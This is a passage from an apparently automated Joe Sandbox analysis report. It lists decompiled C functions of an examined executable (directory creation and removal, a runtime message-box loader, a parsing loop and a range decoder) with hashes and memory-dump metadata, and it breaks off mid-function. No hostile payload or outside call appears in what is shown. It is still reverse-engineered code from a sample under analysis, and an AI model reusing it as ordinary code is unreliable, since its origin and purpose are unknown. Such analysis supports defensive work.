                              • CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory
                              • String ID:
                              • API String ID: 4241100979-0
                              • Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
                              • Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004048AA(CHAR* __ecx) {
                              				signed int _t3;
                              
                              				_t3 = RemoveDirectoryA(__ecx); // executed
                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                              			}





                              APIs
                              • RemoveDirectoryA.KERNELBASE(?,00404D27,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 004048AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: DirectoryRemove
                              • String ID:
                              • API String ID: 597925465-0
                              • Opcode ID: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction ID: 8a2519b774f471bade5b05e48f192836a719b77eeaa2736f11b150acbb720719
                              • Opcode Fuzzy Hash: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction Fuzzy Hash: E7A002603112058796241B315F0968F295D9D455D1706C5696516C4060DB29C5505555
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E00418320(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                              				intOrPtr* _t4;
                              				intOrPtr* _t7;
                              				_Unknown_base(*)()* _t11;
                              				void* _t14;
                              				struct HINSTANCE__* _t15;
                              				void* _t17;
                              
                              				_t14 = 0;
                              				_t17 =  *0x423514 - _t14; // 0x0
                              				if(_t17 != 0) {
                              					L4:
                              					_t4 =  *0x423518; // 0x0
                              					if(_t4 != 0) {
                              						_t14 =  *_t4();
                              						if(_t14 != 0) {
                              							_t7 =  *0x42351c; // 0x0
                              							if(_t7 != 0) {
                              								_t14 =  *_t7(_t14);
                              							}
                              						}
                              					}
                              					return  *0x423514(_t14, _a4, _a8, _a12);
                              				}
                              				_t15 = LoadLibraryA("user32.dll");
                              				if(_t15 == 0) {
                              					L10:
                              					return 0;
                              				}
                              				_t11 = GetProcAddress(_t15, "MessageBoxA");
                              				 *0x423514 = _t11;
                              				if(_t11 == 0) {
                              					goto L10;
                              				} else {
                              					 *0x423518 = GetProcAddress(_t15, "GetActiveWindow");
                              					 *0x42351c = GetProcAddress(_t15, "GetLastActivePopup");
                              					goto L4;
                              				}
                              			}










                              APIs
                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                              • API String ID: 2238633743-4044615076
                              • Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
                              • Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 99%
                              			E0040E5A5(intOrPtr __ecx, signed int __edx) {
                              				signed int _t133;
                              				intOrPtr _t135;
                              				signed int _t136;
                              				signed int _t137;
                              				signed int _t148;
                              				intOrPtr _t159;
                              				signed int _t160;
                              				intOrPtr _t162;
                              				void* _t164;
                              				signed int _t167;
                              				intOrPtr _t175;
                              				signed int _t177;
                              				signed int _t183;
                              				intOrPtr _t184;
                              				intOrPtr _t185;
                              				intOrPtr _t201;
                              				signed int _t211;
                              				signed int _t214;
                              				signed int _t215;
                              				intOrPtr _t217;
                              				signed int _t218;
                              				void* _t219;
                              				void* _t220;
                              				void* _t221;
                              				signed int _t223;
                              				signed int _t225;
                              				void* _t226;
                              
                              				_t211 = __edx;
                              				E00413954(E0041A690, _t226);
                              				_t175 = __ecx;
                              				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
                              				E004042D6();
                              				_t223 =  *(_t226 + 8);
                              				E00404327( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
                              				while(1) {
                              					_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              					_t183 = _t211;
                              					 *(_t226 - 0x1c) = _t133;
                              					 *(_t226 - 0x18) = _t183;
                              					if(_t133 != 0xd) {
                              						goto L6;
                              					}
                              					L2:
                              					_t211 = 0;
                              					if(_t183 != 0) {
                              						L7:
                              						__eflags = _t133 - 0xa;
                              						if(_t133 != 0xa) {
                              							L9:
                              							__eflags = _t133 - 9;
                              							if(_t133 != 9) {
                              								L11:
                              								__eflags = _t133 | _t183;
                              								if((_t133 | _t183) == 0) {
                              									L13:
                              									_t135 =  *((intOrPtr*)(_t226 + 0xc));
                              									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
                              									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
                              										L17:
                              										_t184 =  *((intOrPtr*)(_t226 + 0xc));
                              										_t214 = 0;
                              										 *(_t226 - 0x10) = 0;
                              										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
                              										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
                              											L27:
                              											__eflags =  *(_t226 - 0x1c) - 9;
                              											if( *(_t226 - 0x1c) == 9) {
                              												__eflags =  *(_t226 - 0x18) - _t211;
                              												if( *(_t226 - 0x18) == _t211) {
                              													_t160 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              													_t184 =  *((intOrPtr*)(_t226 + 0xc));
                              													 *(_t226 - 0x18) = _t211;
                              													 *(_t226 - 0x1c) = _t160;
                              													_t211 = 0;
                              													__eflags = 0;
                              												}
                              											}
                              											_t215 =  *(_t223 + 8);
                              											 *(_t226 - 0x10) = _t211;
                              											__eflags = _t215 - _t211;
                              											 *(_t226 + 8) = _t211;
                              											if(_t215 <= _t211) {
                              												L37:
                              												_t136 =  *(_t226 - 0x1c);
                              												__eflags = _t136 - 0xa;
                              												if(_t136 != 0xa) {
                              													L48:
                              													_t137 = _t136 |  *(_t226 - 0x18);
                              													__eflags = _t137;
                              													if(_t137 == 0) {
                              														_t185 =  *((intOrPtr*)(_t226 + 0x14));
                              														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
                              														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
                              															L54:
                              															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
                              															return _t137;
                              														}
                              														E0040D9F9(_t185,  *(_t226 + 8));
                              														_t137 = E004042D6();
                              														_t225 =  *(_t226 + 8);
                              														__eflags = _t225;
                              														if(_t225 <= 0) {
                              															goto L54;
                              														} else {
                              															goto L53;
                              														}
                              														do {
                              															L53:
                              															_t137 = E004039DF( *((intOrPtr*)(_t226 + 0x18)), 0);
                              															_t225 = _t225 - 1;
                              															__eflags = _t225;
                              														} while (_t225 != 0);
                              														goto L54;
                              													}
                              													E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              													L50:
                              													 *(_t226 - 0x1c) = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              													 *(_t226 - 0x18) = _t211;
                              													goto L36;
                              												}
                              												__eflags =  *(_t226 - 0x18) - _t211;
                              												if(__eflags != 0) {
                              													goto L48;
                              												}
                              												 *(_t226 - 0x48) = _t211;
                              												 *(_t226 - 0x44) = _t211;
                              												 *(_t226 - 0x40) = _t211;
                              												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
                              												 *((intOrPtr*)(_t226 - 0x4c)) = 0x41b748;
                              												 *(_t226 - 4) = _t211;
                              												 *(_t226 - 0x34) = _t211;
                              												 *(_t226 - 0x30) = _t211;
                              												 *(_t226 - 0x2c) = _t211;
                              												 *((intOrPtr*)(_t226 - 0x28)) = 4;
                              												 *((intOrPtr*)(_t226 - 0x38)) = 0x41b684;
                              												 *(_t226 - 4) = 1;
                              												E0040E23F(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
                              												_t177 = 0;
                              												__eflags =  *(_t223 + 8);
                              												 *(_t226 + 0x10) = 0;
                              												if( *(_t223 + 8) <= 0) {
                              													L47:
                              													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
                              													E004042AD(_t226 - 0x38);
                              													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
                              													E004042AD(_t226 - 0x4c);
                              													_t175 =  *((intOrPtr*)(_t226 - 0x14));
                              													goto L50;
                              												} else {
                              													goto L40;
                              												}
                              												do {
                              													L40:
                              													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
                              													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
                              													__eflags = _t148 - 1;
                              													if(_t148 != 1) {
                              														L43:
                              														__eflags = _t148;
                              														if(_t148 <= 0) {
                              															goto L46;
                              														}
                              														_t218 = _t148;
                              														do {
                              															E0040C413( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
                              															E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
                              															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
                              															_t218 = _t218 - 1;
                              															__eflags = _t218;
                              														} while (_t218 != 0);
                              														goto L46;
                              													}
                              													__eflags =  *((char*)(_t217 + 0x54));
                              													if( *((char*)(_t217 + 0x54)) == 0) {
                              														goto L43;
                              													}
                              													E0040C413( *((intOrPtr*)(_t226 + 0x14)), _t148);
                              													E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
                              													L46:
                              													_t177 = _t177 + 1;
                              													__eflags = _t177 -  *(_t223 + 8);
                              												} while (_t177 <  *(_t223 + 8));
                              												goto L47;
                              											} else {
                              												 *(_t226 + 0x10) =  *(_t184 + 0xc);
                              												do {
                              													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
                              													__eflags = _t201 - 1;
                              													if(_t201 != 1) {
                              														L34:
                              														_t64 = _t226 - 0x10;
                              														 *_t64 =  *(_t226 - 0x10) + _t201;
                              														__eflags =  *_t64;
                              														goto L35;
                              													}
                              													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
                              													__eflags =  *((char*)(_t159 + 0x54));
                              													if( *((char*)(_t159 + 0x54)) != 0) {
                              														goto L35;
                              													}
                              													goto L34;
                              													L35:
                              													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
                              													_t211 = _t211 + 1;
                              													__eflags = _t211 - _t215;
                              												} while (_t211 < _t215);
                              												L36:
                              												_t211 = 0;
                              												__eflags = 0;
                              												goto L37;
                              											}
                              										} else {
                              											goto L18;
                              										}
                              										do {
                              											L18:
                              											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
                              											__eflags = _t162 - _t211;
                              											if(_t162 == _t211) {
                              												goto L26;
                              											}
                              											__eflags = _t162 - 1;
                              											 *(_t226 - 0x24) = _t211;
                              											 *(_t226 - 0x20) = _t211;
                              											if(_t162 <= 1) {
                              												L25:
                              												_t164 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
                              												asm("sbb edx, [ebp-0x20]");
                              												E0040F953( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
                              												_t184 =  *((intOrPtr*)(_t226 + 0xc));
                              												_t211 = 0;
                              												__eflags = 0;
                              												goto L26;
                              											}
                              											_t167 = _t162 - 1;
                              											__eflags = _t167;
                              											 *(_t226 + 8) = _t167;
                              											do {
                              												__eflags =  *(_t226 - 0x1c) - 9;
                              												if( *(_t226 - 0x1c) == 9) {
                              													__eflags =  *(_t226 - 0x18) - _t211;
                              													if( *(_t226 - 0x18) == _t211) {
                              														_t219 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              														E0040F953( *(_t226 + 0x10), _t219, _t211);
                              														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
                              														_t214 =  *(_t226 - 0x10);
                              														asm("adc [ebp-0x20], ebx");
                              														_t175 =  *((intOrPtr*)(_t226 - 0x14));
                              														_t211 = 0;
                              														__eflags = 0;
                              													}
                              												}
                              												_t36 = _t226 + 8;
                              												 *_t36 =  *(_t226 + 8) - 1;
                              												__eflags =  *_t36;
                              											} while ( *_t36 != 0);
                              											goto L25;
                              											L26:
                              											_t214 = _t214 + 1;
                              											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
                              											 *(_t226 - 0x10) = _t214;
                              										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
                              										goto L27;
                              									}
                              									_t220 = 0;
                              									__eflags =  *(_t223 + 8) - _t211;
                              									if( *(_t223 + 8) <= _t211) {
                              										goto L17;
                              									} else {
                              										goto L15;
                              									}
                              									do {
                              										L15:
                              										E004039DF( *((intOrPtr*)(_t226 + 0xc)), 1);
                              										_t220 = _t220 + 1;
                              										__eflags = _t220 -  *(_t223 + 8);
                              									} while (_t220 <  *(_t223 + 8));
                              									_t211 = 0;
                              									__eflags = 0;
                              									goto L17;
                              								}
                              								E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              								while(1) {
                              									_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              									_t183 = _t211;
                              									 *(_t226 - 0x1c) = _t133;
                              									 *(_t226 - 0x18) = _t183;
                              									if(_t133 != 0xd) {
                              										goto L6;
                              									}
                              									goto L2;
                              								}
                              								goto L6;
                              							}
                              							__eflags = _t183 - _t211;
                              							if(_t183 == _t211) {
                              								goto L13;
                              							}
                              							goto L11;
                              						}
                              						__eflags = _t183 - _t211;
                              						if(_t183 == _t211) {
                              							goto L13;
                              						}
                              						goto L9;
                              					}
                              					_t221 = 0;
                              					if( *(_t223 + 8) <= 0) {
                              						continue;
                              					} else {
                              						goto L4;
                              					}
                              					do {
                              						L4:
                              						E004039DF( *((intOrPtr*)(_t226 + 0xc)), E0040DC90(0));
                              						_t221 = _t221 + 1;
                              					} while (_t221 <  *(_t223 + 8));
                              					continue;
                              					L6:
                              					_t211 = 0;
                              					__eflags = 0;
                              					goto L7;
                              				}
}

Address column for the C-Code listing above (the per-line instruction addresses Joe Sandbox shows beside the decompiled code, flattened into a separate block on this page). The mapped addresses run from 0x0040e5a5 to 0x0040e868; 0x00000000 entries sit on lines that have no mapped instruction.

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction ID: 21f6de2b17b1780f59bfe67bff07a3778763215a5d034522e7ff50d1aecbc74d
                              • Opcode Fuzzy Hash: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                              • Instruction Fuzzy Hash: 86A1FA70E002099FCB18DF96C4919AEB7B2FFA4314F14887FE815A7291DB39AD61CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004126B0(void* __eax, signed int* __ecx) {
                              				intOrPtr _t149;
                              				unsigned int _t153;
                              				signed int _t157;
                              				signed int _t158;
                              				intOrPtr _t159;
                              				signed int _t160;
                              				signed int _t161;
                              				signed char* _t162;
                              				signed int _t164;
                              				intOrPtr _t167;
                              				signed int _t168;
                              				signed char* _t169;
                              				signed int _t171;
                              				signed char* _t179;
                              				signed int _t190;
                              				signed int _t192;
                              				signed int _t196;
                              				signed char* _t197;
                              				signed char* _t199;
                              				signed int _t204;
                              				signed short* _t205;
                              				void* _t206;
                              				signed int _t207;
                              				signed int _t215;
                              				signed int _t216;
                              				signed char* _t225;
                              				signed int _t228;
                              				signed int _t232;
                              				signed int _t235;
                              				signed int _t238;
                              				signed int _t241;
                              				signed int _t244;
                              				signed int _t247;
                              				signed char _t251;
                              				void* _t252;
                              				signed int _t265;
                              				signed int _t270;
                              				signed int _t271;
                              				signed int _t272;
                              				signed int _t278;
                              				signed char* _t279;
                              				signed int _t281;
                              				signed int _t283;
                              				signed int _t284;
                              				signed int _t285;
                              				signed int _t286;
                              				signed int _t287;
                              				signed int _t288;
                              				signed int _t289;
                              				signed int _t290;
                              				unsigned int _t291;
                              				signed int* _t292;
                              				intOrPtr _t293;
                              				signed char* _t294;
                              				signed short* _t296;
                              				signed int _t297;
                              				signed int _t298;
                              				signed int _t300;
                              				signed int _t301;
                              				signed int _t310;
                              				signed int _t314;
                              				signed int _t319;
                              				signed int _t320;
                              				signed int _t321;
                              				signed int _t322;
                              				signed int _t323;
                              				signed int _t324;
                              				signed int _t325;
                              				signed int _t340;
                              				signed int _t341;
                              				signed int _t342;
                              				signed char* _t344;
                              				void* _t351;
                              
                              				_t292 = __ecx;
                              				_t340 =  *(__ecx + 0x34);
                              				_t283 =  *(__ecx + 0x1c);
                              				_t321 =  *(__ecx + 0x20);
                              				_t149 =  *((intOrPtr*)(__ecx + 0x10));
                              				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
                              				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
                              				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
                              				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
                              				if(_t283 >= 0x1000000) {
                              					L4:
                              					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
                              					if(_t321 >= _t153) {
                              						_t293 =  *((intOrPtr*)(_t351 + 0x14));
                              						_t225 =  *(_t351 + 0x28);
                              						_t284 = _t283 - _t153;
                              						_t322 = _t321 - _t153;
                              						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
                              						if(_t284 >= 0x1000000) {
                              							L39:
                              							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
                              							if(_t322 >= _t157) {
                              								_t285 = _t284 - _t157;
                              								_t323 = _t322 - _t157;
                              								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
                              								 *(_t351 + 0x1c) = 3;
                              								if(_t285 >= 0x1000000) {
                              									L44:
                              									_t228 = (_t285 >> 0xb) * _t158;
                              									_t159 =  *((intOrPtr*)(_t351 + 0x14));
                              									if(_t323 >= _t228) {
                              										_t294 =  *(_t351 + 0x28);
                              										_t286 = _t285 - _t228;
                              										_t324 = _t323 - _t228;
                              										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
                              										if(_t286 >= 0x1000000) {
                              											L55:
                              											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
                              											if(_t324 >= _t232) {
                              												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
                              												_t287 = _t286 - _t232;
                              												_t323 = _t324 - _t232;
                              												if(_t287 >= 0x1000000) {
                              													L60:
                              													_t235 = (_t287 >> 0xb) * _t160;
                              													if(_t323 >= _t235) {
                              														goto L62;
                              													} else {
                              														_t288 = _t235;
                              													}
                              													goto L63;
                              												} else {
                              													if(_t294 >=  *(_t351 + 0x10)) {
                              														goto L2;
                              													} else {
                              														_t287 = _t287 << 8;
                              														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
                              														 *(_t351 + 0x28) =  &(_t294[1]);
                              														goto L60;
                              													}
                              												}
                              											} else {
                              												_t288 = _t232;
                              												goto L63;
                              											}
                              										} else {
                              											if(_t294 >=  *(_t351 + 0x10)) {
                              												goto L2;
                              											} else {
                              												_t286 = _t286 << 8;
                              												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
                              												_t294 =  &(_t294[1]);
                              												 *(_t351 + 0x28) = _t294;
                              												goto L55;
                              											}
                              										}
                              									} else {
                              										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
                              										_t179 =  *(_t351 + 0x28);
                              										_t287 = _t228;
                              										if(_t228 >= 0x1000000) {
                              											L48:
                              											_t235 = (_t287 >> 0xb) * _t314;
                              											if(_t323 >= _t235) {
                              												L62:
                              												_t288 = _t287 - _t235;
                              												_t323 = _t323 - _t235;
                              												L63:
                              												_t225 =  *(_t351 + 0x28);
                              												 *(_t351 + 0x20) = 0xc;
                              												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
                              												goto L64;
                              											} else {
                              												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
                              													return 3;
                              												} else {
                              													goto L2;
                              												}
                              											}
                              										} else {
                              											if(_t179 >=  *(_t351 + 0x10)) {
                              												goto L2;
                              											} else {
                              												_t287 = _t228 << 8;
                              												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
                              												_t179 =  &(_t179[1]);
                              												 *(_t351 + 0x28) = _t179;
                              												goto L48;
                              											}
                              										}
                              									}
                              								} else {
                              									if(_t225 >=  *(_t351 + 0x10)) {
                              										goto L2;
                              									} else {
                              										_t285 = _t285 << 8;
                              										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
                              										 *(_t351 + 0x28) =  &(_t225[1]);
                              										goto L44;
                              									}
                              								}
                              							} else {
                              								_t288 = _t157;
                              								 *(_t351 + 0x20) = 0;
                              								_t296 = _t293 + 0x664;
                              								 *(_t351 + 0x1c) = 2;
                              								L64:
                              								_t161 =  *_t296 & 0x0000ffff;
                              								if(_t288 >= 0x1000000) {
                              									L67:
                              									_t238 = (_t288 >> 0xb) * _t161;
                              									_t162 =  *(_t351 + 0x28);
                              									if(_t323 >= _t238) {
                              										_t341 = _t296[1] & 0x0000ffff;
                              										_t289 = _t288 - _t238;
                              										_t325 = _t323 - _t238;
                              										if(_t289 >= 0x1000000) {
                              											L72:
                              											_t241 = (_t289 >> 0xb) * _t341;
                              											if(_t325 >= _t241) {
                              												_t290 = _t289 - _t241;
                              												_t325 = _t325 - _t241;
                              												_t205 =  &(_t296[0x102]);
                              												_t342 = 0x10;
                              												 *(_t351 + 0x18) = 0x100;
                              											} else {
                              												_t342 = 8;
                              												_t290 = _t241;
                              												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
                              												 *(_t351 + 0x18) = 8;
                              											}
                              											goto L75;
                              										} else {
                              											if(_t162 >=  *(_t351 + 0x10)) {
                              												goto L2;
                              											} else {
                              												_t289 = _t289 << 8;
                              												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
                              												_t162 =  &(_t162[1]);
                              												 *(_t351 + 0x28) = _t162;
                              												goto L72;
                              											}
                              										}
                              									} else {
                              										_t290 = _t238;
                              										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
                              										_t342 = 0;
                              										 *(_t351 + 0x18) = 8;
                              										L75:
                              										_t297 = 1;
                              										L76:
                              										while(1) {
                              											if(_t290 >= 0x1000000) {
                              												L79:
                              												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
                              												if(_t325 >= _t244) {
                              													_t290 = _t290 - _t244;
                              													_t325 = _t325 - _t244;
                              													_t297 = _t297 + _t297 + 1;
                              												} else {
                              													_t290 = _t244;
                              													_t297 = _t297 + _t297;
                              												}
                              												_t164 =  *(_t351 + 0x18);
                              												if(_t297 >= _t164) {
                              													_t298 = _t297 + _t342 - _t164;
                              													if( *(_t351 + 0x20) >= 4) {
                              														goto L20;
                              													} else {
                              														if(_t298 >= 4) {
                              															_t298 = 3;
                              														}
                              														_t167 =  *((intOrPtr*)(_t351 + 0x14));
                              														_t344 =  *(_t351 + 0x28);
                              														_t128 = _t167 + 0x360; // 0x363
                              														_t206 = (_t298 << 7) + _t128;
                              														_t300 = 1;
                              														do {
                              															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
                              															if(_t290 >= 0x1000000) {
                              																goto L91;
                              															} else {
                              																if(_t344 >=  *(_t351 + 0x10)) {
                              																	goto L2;
                              																} else {
                              																	_t290 = _t290 << 8;
                              																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                              																	_t344 =  &(_t344[1]);
                              																	goto L91;
                              																}
                              															}
                              															goto L113;
                              															L91:
                              															_t247 = (_t290 >> 0xb) * _t168;
                              															if(_t325 >= _t247) {
                              																_t290 = _t290 - _t247;
                              																_t325 = _t325 - _t247;
                              																_t300 = _t300 + _t300 + 1;
                              															} else {
                              																_t290 = _t247;
                              																_t300 = _t300 + _t300;
                              															}
                              														} while (_t300 < 0x40);
                              														_t301 = _t300 - 0x40;
                              														if(_t301 < 4) {
                              															goto L21;
                              														} else {
                              															_t251 = (_t301 >> 1) - 1;
                              															if(_t301 >= 0xe) {
                              																_t169 =  *(_t351 + 0x10);
                              																_t252 = _t251 - 4;
                              																do {
                              																	if(_t290 >= 0x1000000) {
                              																		goto L102;
                              																	} else {
                              																		if(_t344 >= _t169) {
                              																			goto L2;
                              																		} else {
                              																			_t290 = _t290 << 8;
                              																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                              																			_t344 =  &(_t344[1]);
                              																			goto L102;
                              																		}
                              																	}
                              																	goto L113;
                              																	L102:
                              																	_t290 = _t290 >> 1;
                              																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
                              																	_t252 = _t252 - 1;
                              																} while (_t252 != 0);
                              																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
                              																_t251 = 4;
                              																goto L104;
                              															} else {
